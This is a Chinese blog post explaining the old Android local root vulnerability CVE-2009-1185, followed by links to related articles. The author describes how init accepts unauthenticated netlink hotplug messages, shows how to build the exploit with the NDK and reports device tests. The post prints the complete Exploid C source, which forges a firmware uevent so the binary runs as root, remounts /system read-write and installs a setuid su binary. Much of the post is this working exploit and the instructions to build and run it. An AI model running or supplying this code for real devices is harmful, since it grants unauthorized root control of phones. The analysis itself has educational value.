安卓root漏洞分析——CVE-2009-1185

最新推荐文章于 2024-10-28 13:01:18 发布
原创 最新推荐文章于 2024-10-28 13:01:18 发布 · 2.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Android #root #漏洞 #CVE-2009-1185 #安卓

本文详细探讨了Android中的一个内核级别漏洞CVE-2009-1185,该漏洞存在于1.x/2.x版本中,允许恶意应用通过udev机制以root权限执行操作。通过分析利用代码和编译过程,展示了如何在受影响的设备上利用该漏洞将system分区挂载为读写模式。实验在不同设备上进行,如HTC G3(2.1系统成功,2.2系统失败)和华为C8650/U8860(2.3系统无效)。

漏洞属于Linux内核级别的漏洞,在android 1.x/2.x版本中同样存在,可以用于系统提权。

Android中使用了udev及机制来执行热插拔,不过它的机制是在init code中实现的,与普通的Linux版本有所不同。其机制是,当有一个设备插入android终端后,会通过socket给init发送一个消息,消息里包含了执行动作的描述,通常是创建某种设备文件,因此init在执行这些操作时,使用的是root权限。问题在于,udev机制中并没有检查消息的来源是否来自内核。如果一个普通的应用给init发送一个udev消息,消息中的动作同样会被以root权限执行。

有幸在http://www.exploit-db.com/exploits/16099/上找到了利用代码源码,在本博文的最后也会将源码贴出。下面大概对利用过程进行一下说明。

这是一个c文件,因此想要编译链接成功这个代码的话需要交叉编译环境。我下载使用的是ndk-r8,交叉编译工具在

$NDK根路径\toolchains\arm-linux-androideabi-4.7\prebuilt\windows\bin


此处的arm-linux-androideabi-4.7应该是交叉编译工具的版本,博主不很明了各个的区别,但是至少应该选择arm-linux-androideabi-为起始的。

这里可以

(1). 直接用以上路径文件夹下的gcc运行类似

gcc -c -o test test.c

的命令进行编译连接。

(2). 书写Android.mk文件如下:

LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
LOCAL_MODULE    := test
LOCAL_SRC_FILES := test.c
include $(BUILD_EXECUTABLE)

并将Android.mk和test.c文件放到命名为jni的文件夹中,并运行“ndk-build”命令。则将在“jni上层目录\obj\local\armeabi”编译连接出二进制文件。

此处又有三点需要说明

  • 在编译源码之前需要进入手机的adb shell中,输入mount命令,查看system分区的具体信息,如下图,并根据信息,更改源码113行左右的函数参数。博主认为直接利用execl函数完成命令“mount -o remount,rw '' system”可以避免这个繁琐的修改过程,不过博主没有验证。


  • 如果不将Android.mk和test.c置于jni文件夹下,将有如下报错:

Android NDK: Could not find application project directory !
Android NDK: Please define the NDK_PROJECT_PATH variable to point to it.
E:\adt-bundle-windows-x86\android-ndk-r8d\build/core/build-local.mk:130: *** Android NDK: Aborting.  Stop.

和ndk环境没有配置成功一般。

  • Android.mk中的这句
    include $(BUILD_EXECUTABLE)

大意是将用于建立可执行文件的库文件引入,如果想要编译的是.so文件,则将这句换为

include $(BUILD_SHARED_LIBRARY)

以上不管哪种方法,生成的可执行文件,更改文件属性为755(Linux环境下更改,博主在windows下利用cygwin更改后传入无用,有些手机中也可以先传入手机再更改,但是在普通用户权限下不一定被允许更改文件属性)。将文件利用adb命令传入Android手机,注意,这里引用作者的说法“* This exploit requires /etc/firmware directory, e.g. it will run on real devices and not inside the emulator.”,更加深入的原因博主也未作深入研究。然后运行调用运行test文件即可。运行结果如下图


然后用户进入打开“飞行模式”“wifi”等方式就可以出发漏洞,将system分区挂在为读写,并将事先复制到sdcards中的su和Superuser.apk文件发复制到到system中。博主再次运行了mount命令进行验证。



最后说明,本次漏洞验证环境是htc g3(T^T穷娃娃用这种破手机做测试。。。),刷了2.2系统不成功,2.1下完美。华为C8650和U8860系统均为2.3.X,运行无效。

对于源码的具体分析由于博主能力有限,不做具体分析了。

/* android 1.x/2.x the real youdev feat. init local root exploit.
 * (C) 2009/2010 by The Android Exploid Crew.
 *
 * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
 * Or use /data/local/tmp if available (thx to ioerror!) It is important to
 * to use /sqlite_stmt_journals directory if available.
 * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
 * or use USB keys etc. This will invoke hotplug which is actually
 * our exploit making /system/bin/rootshell.
 * This exploit requires /etc/firmware directory, e.g. it will
 * run on real devices and not inside the emulator.
 * I'd like to have this exploitet by using the same blockdevice trick
 * as in udev, but internal structures only allow world writable char
 * devices, not block devices, so I used the firmware subsystem.
 *
 * !!!This is PoC code for educational purposes only!!!
 * If you run it, it might crash your device and make it unusable!
 * So you use it at your own risk!
 *
 * Thx to all the TAEC supporters.
 */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>
 
 
#define SECRET "secretlol"
 
 
void die(const char *msg)
{
perror(msg);
exit(errno);
}
 
 
void copy(const char *from, const char *to)
{
int fd1, fd2;
char buf[0x1000];
ssize_t r = 0;
 
if ((fd1 = open(from, O_RDONLY)) < 0)
die("[-] open");
if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0)
die("[-] open");
for (;;) {
r = read(fd1, buf, sizeof(buf));
if (r < 0)
die("[-] read");
if (r == 0)
break;
if (write(fd2, buf, r) != r)
die("[-] write");
}
 
close(fd1);
close(fd2);
sync(); sync();
}
 
 
void clear_hotplug()
{
int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
write(ofd, "", 1);
close(ofd);
}
 
 
int main(int argc, char **argv, char **env)
{
char buf[512], path[512];
int ofd;
struct sockaddr_nl snl;
struct iovec iov = {buf, sizeof(buf)};
struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
int sock;
char *basedir = NULL;
 
 
/* I hope there is no LD_ bug in androids rtld :) */
/*if (geteuid() == 0 && getuid() != 0)
rootshell(env);*/
 
if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
die("[-] readlink");
 
if (geteuid() == 0) {
clear_hotplug();
/* remount /system rw */
//DROID 1 and Ally
//mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0);
//DROID X
//mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0);
//GALAXY S
mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0);
//Eris and HTC Hero
//mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0);
//copy("/sdcard/su","/system/bin/su");
//copy("/sdcard/Superuser.apk","/system/app/Superuser.apk");
copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su");
copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk");
chmod("/system/bin/su", 04755);
chmod("/system/app/Superuser.apk", 04744);
 
for (;;);
}
 
//basedir = "/sqlite_stmt_journals";
basedir = "/data/data/com.unstableapps.easyroot/files";
if (chdir(basedir) < 0) {
basedir = "/data/local/tmp";
if (chdir(basedir) < 0)
basedir = strdup(getcwd(buf, sizeof(buf)));
}
 
memset(&snl, 0, sizeof(snl));
snl.nl_pid = 1;
snl.nl_family = AF_NETLINK;
 
if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
die("[-] socket");
 
close(creat("loading", 0666));
if ((ofd = creat("hotplug", 0644)) < 0)
die("[-] creat");
if (write(ofd, path , strlen(path)) < 0)
die("[-] write");
close(ofd);
symlink("/proc/sys/kernel/hotplug", "data");
snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
        "SUBSYSTEM=firmware%c"
        "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
printf("[+] sending add message ...\n");
if (sendmsg(sock, &msg, 0) < 0)
die("[-] sendmsg");
close(sock);
sleep(3);
return 0;
}


VMware vCenter Server任意文件上传漏洞CVE-2021-22005)复现
渗透之路,攻防之间皆学问
09-29 1万+
目录 漏洞描述 影响版本 漏洞检测poc 漏洞EXP 声明:切勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8.
zabbix SQL注入漏洞CVE-2016-10134)
渗透之路,攻防之间皆学问
03-05 5046
目录 一. 漏洞描述 二. 环境搭建 三. 漏洞复现 四. 漏洞修复 五. 漏洞检测脚本 一. 漏洞描述 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]和jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。这里就介绍jsrpc.php页中的sql注入 影响版本:zabbix 2.2.x,3...
Exploid:CVE-2009-1185 init未检查NETLINK消息来源,本地提权漏洞
漫步者的博客
07-27 1476
一、背景知识       udev 是Linux kernel 2.6系列的设备管理器。它主要的功能是管理/dev目录底下的设备节点。它同时也是用来接替devfs及hotplug的功能,这意味着它要在添加/删除硬件时处理/dev目录以及所有用户空间的行为,包括加载firmware时。  udev是硬件平台无关的,属于user space的进程,它脱离驱动层的关联而建立在操作系统之上,基于这种设
Android Root方法原理解析及Hook(一) adbd漏洞
热门推荐
Mind In Chaos
02-23 3万+
漏洞在于Android源码中的 adb.c文件 中 int main(){ ... ... setgid(AIL_SHELL); // 失败不退出 setuid(AIL_SHELL); //同上 ... ... } adbd进程启动,开始时会以root权限执行一些初始化操作,之后会降权至当前shell用户权限;但若降权失败,adbd进程不会退出,仍然启动起来,此时就
Android代码-基于CVE-2015-1805漏洞root工具
08-06
iovyroot A root tool based on the CVE-2015-1805 vulnerability It supports 32 and 64bit but requires absolute kernel addresses (see offsets.c) poc was done by idler1984 https://github.com/idl3r/testcode
Root exploit for Android (adb setuid)
莫灰灰的专栏
07-02 4548
/* 本文章由 莫灰灰 编写,转载请注明出处。   作者:莫灰灰    邮箱: minzhenfei@163.com */ 1. 漏洞分析 这是个很老的漏洞了,主要利用adb启动的时候调用setuid函数降到shell权限,却没有判断setuid返回失败的情况,因此造成了root的可能 如下是已经修复漏洞后的代码: 原本的代码大致如下: setgid(A
关于Androidroot提权漏洞
Tesi1a的充电桩
09-09 1万+
以下两个转自于知乎少仲哥 和flanker_hqd的回答:1.CVE-2009-2692(Wunderbar/asroot)sock_sendpage()的空指针解引用.因为sock_sendpage 没有对 socket_file_ops 结构的 sendpage 字段做指针检查,有些模块不具备sendpage 功能,初始时赋为 NULL,这样,没有做检查的sock_sendpage 有可能直接调
CVE-2017-8890- 8.x以下的root漏洞
04-04
"CVE-2017-8890" 是一个特定的安全漏洞编号,它代表了2017年发现的一个名为“8.x以下的root漏洞”的安全问题。CVE,全称为“Common Vulnerabilities and Exposures”,是国际上广泛使用的一种公开的、标准化的安全...
Android 2020 安全报告,CVE-2020-0423 android内核提权漏洞分析
weixin_33581743的博客
05-27 1079
简介2020年10月公布了bulletin,这是最近新的提权漏洞,存在于binder中。这个漏洞大致上是binder的sender和receive端的对binder_node结构体的race condition转化为uaf漏洞,作者进一步触发了double free,结合后续巧妙的堆喷分配,利用slub和ksma机制,绕过kalsr和cfi保护,官方给出影响的版本在Android 8-11之间,详...
CVE-2014-7911 Android 反序列化漏洞分析
Venscor技术养成之路
02-19 3693
网上对于此漏洞分析已经很多了,由于这个漏洞设计了很多底层的知识,很值得学习。总算耐着性子把这个漏洞分析了一下,文章主要记录自己的分析过程。
安全漏洞概念及分类
11-21
本文是一个安全漏洞相关的科普,介绍安全漏洞的概念认识,漏洞在几个维度上的分类及实例展示。
CVE-2017-8890漏洞分析与利用(Root Android 7.x)
omnispace的博客
02-04 3053
漏洞简介 cve.mitre.org 网站给出的信息如下: The inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel through 4.10.15 allows attackers to cause a denial of service (double free
cve-2015-0569 安卓手机提权ROOT漏洞 分析
omnispace的博客
03-20 3727
测试机器:nexus4       android版本:4.4   内核版本3.4.0  漏洞介绍:函数进行拷贝时没有对长度进行判断,导致用户可以修改内核栈中值。 漏洞利用:通过修改函数返回地址,来进行提权操作 1,首先找到官方的修补代码 修补代码地址:https://www.codeaurora.org/cgit/quic/la/platform/vendor/qcom-openso
android 最新漏洞 root,新漏洞可获取root权限 所有安卓机躺枪
weixin_39832829的博客
05-25 1057
原标题:新漏洞可获取root权限 所有安卓机躺枪【中关村在线软件资讯】10月25日消息:Android系统的安全问题可以用源源不断来形容,最近一个新的严重漏洞被发现,该漏洞甚至可以获取root权限。安全专家David Manouchehri日前公布了这个名为脏牛(Dirty COW)的Linux漏洞的源代码,该漏洞允许攻击者在内核操作中不断提升自己的权限并作为合法用户来执行远程代码。该漏洞由安全专...
两个漏洞可让十亿安卓手机被获取 Root 权限?
weixin_34126557的博客
06-06 169
趋势科技报道,数十亿的安卓设备上发现安全漏洞,攻击者可通过简单的操作获取root访问权限。 目前市场上大部分的智能设备都在使用Qualcomm Snapdragon SoCs(系统芯片),据该公司官网上统计,有超过10亿的设备使用Snapdragon芯片。然而不幸的是,安全研究员们发现数个安全漏洞会影响Snapdragon芯片,可被攻击者获取访问设备的...
安卓10使用root环境
【03】的博客
07-17 7956
1.安装VMOS安卓虚拟系统实现 下载VMOS 安装成功之后虚拟系统会默认安装root环境 只需要将修改器,脚本,在VMOS里边运行即可【 VMOS下载地址】 缺点:耗内存,如在虚拟系统里面玩游戏开挂容易卡顿发热 2.安装平行空间+插件实现 下载平行空间 下载插件并安装 将需要root权限的软件添加到平行空间 在平行空间打开相关软件即可 【平行空间App下载地址】【插件1 com.parallel.space.pro.arm32.apk】【插件2 com.lbe.parallel.intl.arm
Android提权root漏洞,【转】结合init源码剖析android root提权漏洞CVE
weixin_42602241的博客
05-29 1136
这篇文章是上一篇博客的后续分析,主要介绍向init进程发送热拔插信息后init进程的处理流程首先我们来了解一个数据结构,uevent,如下struct uevent {const char *action;const char *path;const char *subsystem;const char *firmware;int major;int minor;};内核收到的信息如下,ACTIO...
Android10 root,Android Q系统Magisk完美实现ROOT
weixin_32312081的博客
05-28 1651
Android Q系统Magisk完美实现ROOT,由于谷歌I/O大会需要等到5月7日举办,理论上我们距离一版较为稳定的Android Q公测系统还有相当时间。但这并未阻止开发者的脚步,尤其是那些极客。达人John Wu分享了最新成果,他为Android Q成功安装了Magisk框架,宣告ROOT 。Magisk和大名鼎鼎的Xposed相互兼容,可以实现对系统的强大模块化定制。早在今年3月Andr...
【亲测免费】 解锁Android 9.0的无限可能:MTK平台Root权限开放指南
gitblog_09813的博客
10-28 717
解锁Android 9.0的无限可能:MTK平台Root权限开放指南 【下载地址】Android9.0开放Root权限 本文档旨在提供关于如何在基于MediaTek(MTK)解决方案的Android 9.0系统上开放root权限的指导。这一资源专为开发者设计,特别是那些致力于修改和深度定制Android系统的开发者。通过...
rabbitmq出现jQuery漏洞——CVE-2020-11022/CVE-2020-11023
最新发布
07-09
### RabbitMQ 中 jQuery 漏洞 CVE-2020-11022 和 CVE-2020-11023 的修复方法 RabbitMQ 提供了一个基于 Web 的管理界面(Management Plugin),该界面依赖于前端库(如 jQuery)来实现用户交互。CVE-2020-11022 和 CVE-2020-11023 是 jQuery 3.5.0 及以下版本中存在的安全漏洞,可能导致跨站脚本攻击(XSS)或执行恶意脚本[^2]。 由于 RabbitMQ 的官方镜像通常使用固定版本的前端资源,并且不提供直接更新前端库的机制,因此无法通过常规方式直接升级 jQuery。不过可以通过以下几种方式进行缓解和修复: #### 替换管理插件中的 jQuery 文件 RabbitMQ 的管理插件前端文件位于容器内的 `/usr/lib/rabbitmq/lib/rabbitmq_server-<version>/plugins/rabbitmq_management-<version>/priv/www` 路径下。可以将其中的 `jquery.min.js` 替换为 jQuery 3.5.1 或更高版本的文件,具体步骤如下: ```bash # 进入运行中的容器 docker exec -it rabbitmq sh # 定位到 jQuery 文件所在目录 cd /usr/lib/rabbitmq/lib/rabbitmq_server-*/plugins/rabbitmq_management-*/priv/www/js/libs/ # 备份旧文件 mv jquery.min.js jquery.min.js.bak # 下载并替换为新版 jQuery wget https://code.jquery.com/jquery-3.6.0.min.js -O jquery.min.js ``` 完成替换后,重启 RabbitMQ 容器以使更改生效: ```bash docker restart rabbitmq ``` 此方法可有效解决 jQuery 相关漏洞带来的风险,但需注意每次升级 RabbitMQ 镜像时都需要重新执行该操作。 #### 禁用管理插件并使用 API 接口替代 如果不需要使用 RabbitMQ 的 Web 管理界面,可以禁用 Management Plugin 以彻底消除前端组件的安全隐患: ```bash docker exec -it rabbitmq rabbitmq-plugins disable rabbitmq_management ``` 随后可通过 RabbitMQ 提供的 HTTP API 进行管理和监控操作,例如获取队列信息: ```bash curl -u admin:securepassword http://localhost:15672/api/queues ``` 这种方式适用于仅需程序访问而无需人工登录的生产环境,能显著降低攻击面[^1]。 #### 使用反向代理限制访问并注入 CSP 头 在部署 RabbitMQ 的环境中配置反向代理(如 Nginx 或 Traefik),并通过响应头注入内容安全策略(Content-Security-Policy),防止恶意脚本执行: ```nginx location / { proxy_pass http://rabbitmq_container; add_header Content-Security-Policy "script-src 'self'"; } ``` 这样即使存在 jQuery 漏洞,也能阻止外部脚本加载和执行,增强整体安全性[^3]。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值